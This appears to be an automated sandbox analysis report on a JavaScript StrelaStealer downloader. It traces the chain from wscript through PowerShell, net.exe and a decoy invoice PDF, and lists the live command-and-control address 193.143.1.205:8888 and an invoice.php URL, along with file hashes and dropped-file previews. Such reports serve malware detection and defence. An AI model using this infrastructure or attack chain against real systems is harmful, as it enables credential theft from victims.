    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590541 Sample: 2330118683179179335.js Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 38 x1.i.lencr.org 2->38 50 Suricata IDS alerts for network traffic 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Sigma detected: Powershell launch regsvr32 2->54 56 6 other signatures 2->56 10 wscript.exe 1 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 60 JScript performs obfuscated calls to suspicious functions 10->60 62 Wscript starts Powershell (via cmd or directly) 10->62 64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->64 66 3 other signatures 10->66 16 cmd.exe 3 2 10->16         started        42 127.0.0.1 unknown unknown 13->42 signatures6 process7 signatures8 44 Suspicious powershell command line found 16->44 46 Wscript starts Powershell (via cmd or directly) 16->46 48 Gathers information about network shares 16->48 19 powershell.exe 14 16 16->19         started        23 cmd.exe 1 16->23         started        26 Acrobat.exe 65 16->26         started        28 conhost.exe 16->28         started        process9 dnsIp10 40 193.143.1.205, 49704, 49705, 80 BITWEB-ASRU unknown 19->40 36 C:\Users\user\AppData\Local\...\invoice.pdf, PDF 19->36 dropped 58 Gathers information about network shares 23->58 30 net.exe 1 23->30         started        32 AcroCEF.exe 109 26->32         started        file11 signatures12 process13 process14 34 AcroCEF.exe 4 32->34         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    2330118683179179335.js21%ReversingLabsScript-JS.Trojan.StrelaStealer
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://193.143.1.205:8888/K0%Avira URL Cloudsafe
    http://193.143.1.205:8888/;0%Avira URL Cloudsafe
    http://193.143.1.205:8888/d0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      x1.i.lencr.org
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://193.143.1.205/invoice.phpfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://g.live.com/odclientsettings/Prod/C:edb.log.9.dr, qmgr.db.9.drfalse
            high
            http://crl.ver)svchost.exe, 00000009.00000002.2801488197.000002C410600000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                high
                http://193.143.1.205:8888/;net.exe, 00000007.00000003.1616072931.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619584929.000001D103A19000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://193.143.1.205:8888/Knet.exe, 00000007.00000003.1616072931.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619584929.000001D103A19000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000009.00000003.1617863049.000002C410430000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                  high
                  http://193.143.1.205:8888/dnet.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.micrososvchost.exe, 00000009.00000003.1700635846.000002C4106E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2801740788.000002C4106E9000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://193.143.1.205:8888/net.exe, 00000007.00000003.1616072931.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619725052.000001D103A3C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619584929.000001D103A19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.1615932604.000001D103A3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://193.143.1.205:8888/snet.exe, 00000007.00000002.1619496596.000001D1039E8000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        193.143.1.205
                        unknownunknown
                        57271BITWEB-ASRUtrue
                        IP
                        127.0.0.1
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1590541
                        Start date and time:2025-01-14 08:55:14 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 13s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (Javascript)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2330118683179179335.js
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winJS@27/60@2/2
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .js
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 199.232.210.172, 2.23.242.162, 2.23.197.184, 2.19.126.149, 2.19.126.143, 23.209.209.135, 23.219.161.132, 20.12.23.50, 18.213.11.84, 23.47.168.24, 13.107.253.45
                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        02:56:24API Interceptor37x Sleep call for process: powershell.exe modified
                        02:56:30API Interceptor1x Sleep call for process: net.exe modified
                        02:56:30API Interceptor2x Sleep call for process: svchost.exe modified
                        02:56:38API Interceptor2x Sleep call for process: AcroCEF.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        193.143.1.205577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        106714464113327088.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        3062912729105825642.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        1684156262492114486.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        3130621478256819696.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        10557253441737814573.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        15994293462788625581.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        3041621112067010510.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        4208093227073.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        14137177262856222939.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205:8888/
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        bg.microsoft.map.fastly.netG7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                        • 199.232.210.172
                        009.vbeGet hashmaliciousAgentTeslaBrowse
                        • 199.232.210.172
                        577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                        • 199.232.210.172
                        RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                        • 199.232.210.172
                        possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        3ClBcOpPUX.exeGet hashmaliciousCyberGateBrowse
                        • 199.232.210.172
                        40#U0433.docGet hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        KymUijfvKi.docGet hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        RoYAd85faz.docGet hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        BITWEB-ASRU577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        106714464113327088.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        3062912729105825642.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        1684156262492114486.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        3130621478256819696.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        10557253441737814573.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        15994293462788625581.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        3041621112067010510.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        4208093227073.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        32230219901300318079.jsGet hashmaliciousStrela DownloaderBrowse
                        • 193.143.1.205
                        No context
                        No context
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1310720
                        Entropy (8bit):0.8022103042868418
                        Encrypted:false
                        SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAY:RJE+Lfki1GjHwU/+vVhWqpB
                        MD5:5D0FAFCE70D72C6E2BE2E15C74468E40
                        SHA1:759860CE57638C63D453E31A867B4B3A47829969
                        SHA-256:804E95F439CAC6B104BF59D710AD84C8FB991E64018BFB1997E628BA1F147237
                        SHA-512:C9E6B052B63EF8703615E39E5689298B8CB2CE2972E1074EFC8D6A0C20294813731E5FD455A223EAF780994A61BBEBD172F63052BE96AFE25EA4D7D2A1140C36
                        Malicious:false
                        Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                        Process:C:\Windows\System32\svchost.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2e94a0f8, page size 16384, DirtyShutdown, Windows version 10.0
                        Category:dropped
                        Size (bytes):1048576
                        Entropy (8bit):0.9432914336419749
                        Encrypted:false
                        SSDEEP:1536:LSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:LazaHvxXy2V2UR
                        MD5:4DF7D45FC6A23428F1E78DD683836570
                        SHA1:CDEA88D7C5E724D9A292BEC7B22AC29A4208DF2A
                        SHA-256:0ED0F46E160639054CA62FD706BF0E5CFB60A8AC2A224F102DA2E4CA267C287B
                        SHA-512:DCFFBA35EC30F7577C5D2C6084D5AB6B223FB87106F6E248B98D8C315C6F1BDA980671412567598AA3CA89AB1555F3E334D744D7F73E482B505E52D78EA9EB0E
                        Malicious:false
                        Preview:....... ...............X\...;...{......................0.x...... ...{s..8...}..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.......................................8...}_..................ls..8...}?..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.08115686099879346
                        Encrypted:false
                        SSDEEP:3:tll8YeMgwYamll/nqlFcl1ZUllllq57bLollGBnX/l/Tj/k7/t:tUzkYzll/qlFclQ/lw50254
                        MD5:EDC008B3D47C4FB940490D92CB7A2BF5
                        SHA1:646B38DBA99FD285B73ADA8BD563E7974A753E5E
                        SHA-256:39115292C0E689ECA7F4D0A54447BB6A5B62B63B0EC4E2A67DFB8E1799242D58
                        SHA-512:8A8A803F35EF6526B515028C5F692E20B3742645DFD95C769D3E52554D9B3BD3BE47F26BFF749C44649CFB65E9A9008556FA41D0ECA6BA9C619B1987AD80962A
                        Malicious:false
                        Preview:.?.;.....................................;...{...8...}?.. ...{s.......... ...{s.. ...{s.P.... ...{s..................ls..8...}?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.200970469899446
                        Encrypted:false
                        SSDEEP:6:iO85TN+q2PCHhJ2nKuAl9OmbnIFUtWZEZmwohtVkwOCHhJ2nKuAl9OmbjLJ:7RvBHAahFUtP/AT56HAaSJ
                        MD5:FAD707A3B9787210B1F85FC0C36328DE
                        SHA1:2915F2F06FAEB8111D5647C7F8D737FBAC5C9029
                        SHA-256:D31532E3EFE1CC3AB3F34DBF0E3BB2DF86DFD0DFE57D6A0AEE46DBB42F3545E4
                        SHA-512:0606651DA4B63FCBDBA9F5F7C83F7E004406872DA79D17CD397F0740A78AC9AA4836CAC48E2FE0E6D9F042B141A06E6795D96E30D5BB2B0EA06B855707C5C774
                        Malicious:false
                        Preview:2025/01/14-02:56:30.149 1aa8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-02:56:30.151 1aa8 Recovering log #3.2025/01/14-02:56:30.152 1aa8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.200970469899446
                        Encrypted:false
                        SSDEEP:6:iO85TN+q2PCHhJ2nKuAl9OmbnIFUtWZEZmwohtVkwOCHhJ2nKuAl9OmbjLJ:7RvBHAahFUtP/AT56HAaSJ
                        MD5:FAD707A3B9787210B1F85FC0C36328DE
                        SHA1:2915F2F06FAEB8111D5647C7F8D737FBAC5C9029
                        SHA-256:D31532E3EFE1CC3AB3F34DBF0E3BB2DF86DFD0DFE57D6A0AEE46DBB42F3545E4
                        SHA-512:0606651DA4B63FCBDBA9F5F7C83F7E004406872DA79D17CD397F0740A78AC9AA4836CAC48E2FE0E6D9F042B141A06E6795D96E30D5BB2B0EA06B855707C5C774
                        Malicious:false
                        Preview:2025/01/14-02:56:30.149 1aa8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-02:56:30.151 1aa8 Recovering log #3.2025/01/14-02:56:30.152 1aa8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):338
                        Entropy (8bit):5.199037495284821
                        Encrypted:false
                        SSDEEP:6:iO8k+q2PCHhJ2nKuAl9Ombzo2jMGIFUtW2ZmwoOaVkwOCHhJ2nKuAl9Ombzo2jM4:7KvBHAa8uFUtD/7S56HAa8RJ
                        MD5:014644E2D0CF994D73BBBFA8A645343E
                        SHA1:2A20CF2247C4A59AEAED8A5D336F0011B71C2ADF
                        SHA-256:6C6B831B48A9C3DD703B1A5490CB96D2CDEE3187CEF3A297EF61D6EC44D9CA7F
                        SHA-512:0D095E86B1FC27706CF0830A396240A23525DAEC63F55D485ED93F6957015C758369810DB1372C9542691333799F5EF0D120ACE61AFFF7D8E171DFFAD20CB822
                        Malicious:false
                        Preview:2025/01/14-02:56:30.209 16f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-02:56:30.210 16f8 Recovering log #3.2025/01/14-02:56:30.211 16f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):338
                        Entropy (8bit):5.199037495284821
                        Encrypted:false
                        SSDEEP:6:iO8k+q2PCHhJ2nKuAl9Ombzo2jMGIFUtW2ZmwoOaVkwOCHhJ2nKuAl9Ombzo2jM4:7KvBHAa8uFUtD/7S56HAa8RJ
                        MD5:014644E2D0CF994D73BBBFA8A645343E
                        SHA1:2A20CF2247C4A59AEAED8A5D336F0011B71C2ADF
                        SHA-256:6C6B831B48A9C3DD703B1A5490CB96D2CDEE3187CEF3A297EF61D6EC44D9CA7F
                        SHA-512:0D095E86B1FC27706CF0830A396240A23525DAEC63F55D485ED93F6957015C758369810DB1372C9542691333799F5EF0D120ACE61AFFF7D8E171DFFAD20CB822
                        Malicious:false
                        Preview:2025/01/14-02:56:30.209 16f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-02:56:30.210 16f8 Recovering log #3.2025/01/14-02:56:30.211 16f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):475
                        Entropy (8bit):4.959241653794348
                        Encrypted:false
                        SSDEEP:12:YH/um3RA8sqIWsBdOg2Hbcaq3QYiub6P7E4T3y:Y2sRdsTdMHi3QYhbS7nby
                        MD5:6E2BD938A7A30B8DFDCA3DD55907240A
                        SHA1:787CF91BA35CBD140B330A036108DC9A27096A7A
                        SHA-256:F1592F7439828A6FE67AAC5426786A8167FF3630D3BAD79D5A2BE52D22D6C2AF
                        SHA-512:06D6892F192A2F7B84C63A657EF336F855D8411CD727616ED57218EE935186E03C50DB32CB3F6A919BE264122087D9CAEDF8CB1A772EB0D00CDED23F84281114
                        Malicious:false
                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381401401762222","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":128194},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:JSON data
                        Category:modified
                        Size (bytes):475
                        Entropy (8bit):4.959241653794348
                        Encrypted:false
                        SSDEEP:12:YH/um3RA8sqIWsBdOg2Hbcaq3QYiub6P7E4T3y:Y2sRdsTdMHi3QYhbS7nby
                        MD5:6E2BD938A7A30B8DFDCA3DD55907240A
                        SHA1:787CF91BA35CBD140B330A036108DC9A27096A7A
                        SHA-256:F1592F7439828A6FE67AAC5426786A8167FF3630D3BAD79D5A2BE52D22D6C2AF
                        SHA-512:06D6892F192A2F7B84C63A657EF336F855D8411CD727616ED57218EE935186E03C50DB32CB3F6A919BE264122087D9CAEDF8CB1A772EB0D00CDED23F84281114
                        Malicious:false
                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381401401762222","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":128194},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3878
                        Entropy (8bit):5.229914444028792
                        Encrypted:false
                        SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bHBtF+:S43C4mS7fFi0KFYDjr3LWO3V3aw+bht4
                        MD5:AD303C41C198E1D6DE5021946EC4EFDE
                        SHA1:16E67BFF0AC446320D6AD5869D4CC2CAD19B6FB0
                        SHA-256:7978D8EA10B06470B172BA1EC24D4861F91E2EBE68A06CF09FFA73CD79EE04DF
                        SHA-512:C2D7DB62CF503308C927A4E947792280D4D486DF0B6F06150515D41FF679AE38F8AB6B65EFABB3EDC3A189A5B2AC11913908F767C8E5FE4F5660BC4C525D3517
                        Malicious:false
                        Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):326
                        Entropy (8bit):5.214963569984256
                        Encrypted:false
                        SSDEEP:6:iO8Ma+q2PCHhJ2nKuAl9OmbzNMxIFUtWCeZmwoCaVkwOCHhJ2nKuAl9OmbzNMFLJ:7FvBHAa8jFUt9e/zS56HAa84J
                        MD5:BE7FA1E6E67325F0EC7FA0E1EA15338C
                        SHA1:7C6AC851E3537386F3C81741ADBDEB534FAB60D1
                        SHA-256:C0B0ECC99FA0CDF1FD440AA81BE6F3D1DA5B77D8B0B974C105CC35AE39A044AE
                        SHA-512:D567E82D2085B9E2FC8A88A34237A994D459610FF8DE191CC8C9CABCEB209FA5D62643D3BD2B3F3B4588F69AD5D27A892BE4B95AAD4B48F950DA7CF9C095E33D
                        Malicious:false
                        Preview:2025/01/14-02:56:30.406 16f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-02:56:30.408 16f8 Recovering log #3.2025/01/14-02:56:30.408 16f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):326
                        Entropy (8bit):5.214963569984256
                        Encrypted:false
                        SSDEEP:6:iO8Ma+q2PCHhJ2nKuAl9OmbzNMxIFUtWCeZmwoCaVkwOCHhJ2nKuAl9OmbzNMFLJ:7FvBHAa8jFUt9e/zS56HAa84J
                        MD5:BE7FA1E6E67325F0EC7FA0E1EA15338C
                        SHA1:7C6AC851E3537386F3C81741ADBDEB534FAB60D1
                        SHA-256:C0B0ECC99FA0CDF1FD440AA81BE6F3D1DA5B77D8B0B974C105CC35AE39A044AE
                        SHA-512:D567E82D2085B9E2FC8A88A34237A994D459610FF8DE191CC8C9CABCEB209FA5D62643D3BD2B3F3B4588F69AD5D27A892BE4B95AAD4B48F950DA7CF9C095E33D
                        Malicious:false
                        Preview:2025/01/14-02:56:30.406 16f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-02:56:30.408 16f8 Recovering log #3.2025/01/14-02:56:30.408 16f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 3, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):57344
                        Entropy (8bit):3.293423914823954
                        Encrypted:false
                        SSDEEP:192:/edRBivVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:/egci5H5FY+EUUUTTcHqFzqFP
                        MD5:49BDAA515DDD0BC3C7F771B115417BC2
                        SHA1:75D0220C6BA5F03516DBEF5F824316A6EC39F6E7
                        SHA-256:887503B882EAA46B3BA15866EBEE60BE21DD332AE510180204CFC0FBEDC5B8E8
                        SHA-512:2E9E6D4CA7B8B2C5ED55798754EDA37C8DBAF652637DF01E32C1E4109D02FD66326497B6ED952CE5BB119DF931E625F7358B9B96EE243B78248E2C6A03D4FD51
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite Rollback Journal
                        Category:dropped
                        Size (bytes):8720
                        Entropy (8bit):2.203513322227487
                        Encrypted:false
                        SSDEEP:24:7+taMEWewKCqLazkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9c:7MzUCqemFTIF3XmHjBoGGR+jMz+Lhe
                        MD5:6B82C68F75E22124C345CED87B3EB21F
                        SHA1:B36FF77240B37FE1F9AD27A1DF66D7032DBEB548
                        SHA-256:01AEC79413D926ADB3A4BFE234A45D0BFFC77BB86AD1E196E4DD67EF40C260E2
                        SHA-512:458C07990283813D711DE9BD9FE1ACAFEFC2954721A8502BFAF4965AE01C83AEB83BCF2166038C16237DC1A781960E834D1A5E4D1DC2FAD562E610D41FFF4F11
                        Malicious:false
                        Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:Certificate, Version=3
                        Category:dropped
                        Size (bytes):1391
                        Entropy (8bit):7.705940075877404
                        Encrypted:false
                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                        Malicious:false
